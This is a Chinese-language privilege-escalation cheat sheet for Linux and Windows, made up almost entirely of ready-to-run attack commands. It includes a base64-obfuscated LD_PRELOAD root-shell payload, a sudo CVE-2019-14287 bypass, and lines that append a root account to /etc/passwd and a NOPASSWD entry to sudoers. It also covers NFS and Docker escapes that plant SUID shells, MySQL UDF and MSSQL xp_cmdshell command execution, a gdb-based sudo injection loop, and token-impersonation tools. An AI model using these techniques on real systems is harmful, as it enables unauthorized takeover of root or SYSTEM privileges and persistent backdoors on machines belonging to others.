系统提权

系统内核

Linux

uname -a && cat /etc/*-release

Windows

#https://i.hacking8.com/tiquan
systeminfo | findstr "OS KB"

错误配置

Linux

• SUDO

#NOPASSWD
sudo -l
#LD_PRELOAD
echo I2luY2x1ZGUgPHN0ZGlvLmg+CiNpbmNsdWRlIDxzeXMvdHlwZXMuaD4KI2luY2x1ZGUgPHN0ZGxpYi5oPgp2b2lkIF9pbml0KCkgewoJdW5zZXRlbnYoIkxEX1BSRUxPQUQiKTsKCXNldGdpZCgwKTsKCXNldHVpZCgwKTsKCXN5c3RlbSgiL2Jpbi9zaCIpOwp9 | base64 -d > /tmp/shell.c && gcc -fPIC -shared -nostartfiles /tmp/shell.c -o /tmp/shell.so
sudo LD_PRELOAD=/tmp/shell.so <COMMAND>
#CVE-2019-14287 && (ALL, !root)
sudo -u#-1 <COMMAND>
sudo -u#4294967295 <COMMAND>

• SUID

find / -perm -u=s -type f 2>/dev/null
find / -perm -g=s -type f 2>/dev/null

• RPATH

readelf -d *** | egrep "NEEDED|RPATH"

• Crontab

crontab -l
ls -al /etc/cron*
ls -al /var/spool/cron/*

• Writable

#查找可写文件
find / -writable ! -user "$(whoami)" ! -path "/sys/*" ! -path "/proc/*" -type f -exec ls -la {} \; 2>/dev/null
#/etc/sudoers
echo "user ALL=(ALL) NOPASSWD: ALL" >> /etc/sudoers
#/etc/passwd
echo "user:$(openssl passwd -1 admin@888..):0:0:user:/:/bin/bash" >> /etc/passwd

Windows

• ServicePermission

use exploit/windows/local/service_permissions

• TrustedServicePath

use exploit/windows/local/unquoted_service_path

• AlwaysInstallElevated

reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

应用服务

Linux

• NFS

#/etc/exports && no_root_squash
showmount -e x.x.x.x
mount -t nfs x.x.x.x:/yyyy /mnt
cd /mnt && cp /bin/bash . && chmod u+s bash

• MySQL

sqlmap -d "mysql://user:passwd@host:3306/mysql" --os-shell

• Docker

docker run -it --rm -v /:/host alpine
cd /host/tmp && cp /host/bin/bash . && chmod u+s bash

Windows

• MySQL

/* 查看版本 */
select version();
/* 读写文件(NULL=>禁止, 空=>允许) */
show variables like "secure_file_priv";
/* 插件目录 */
show variables like "%plugin%";
/* UDF && MySQL<5.1 (C:/Windows/System32/), MySQL>5.1 (MySQL/lib/plugin/) */
select 0x4d5a900... into dumpfile "***";
create function sys_eval returns string soname "UDF.dll";
select sys_eval("whoami");
drop function sys_eval;
/* MOF && Windows<=2003 */
use exploit/windows/mysql/mysql_mof

• MSSQL

/* xp_cmdshell */
exec sp_configure 'show advanced options', 1; reconfigure;
exec sp_configure 'xp_cmdshell', 1; reconfigure;
exec master..xp_cmdshell 'whoami';
/* sp_oacreate */
exec sp_configure 'show advanced options', 1; reconfigure;
exec sp_configure 'Ole Automation Procedures', 1; reconfigure;
declare @shell int exec sp_oacreate 'wscript.shell', @shell output exec sp_oamethod @shell, 'run', null, 'C:\Windows\System32\cmd.exe /c whoami'

令牌操纵

Linux

• Sudo_Inject

#/proc/sys/kernel/yama/ptrace_scope == 0
for PID in $(pgrep "^(bash|dash|sh|zsh)$" -u $(id -u)); do echo "call system(\"echo | sudo -S chmod +s /bin/sh &>/dev/null\")" | gdb -q -n -p $PID &>/dev/null; done

Windows

• Meterpreter

use incognito
list_tokens -u
impersonate_token "NT AUTHORITY\SYSTEM"

• SweetPotato

SweetPotato.exe -e PrintSpoofer -a "whoami"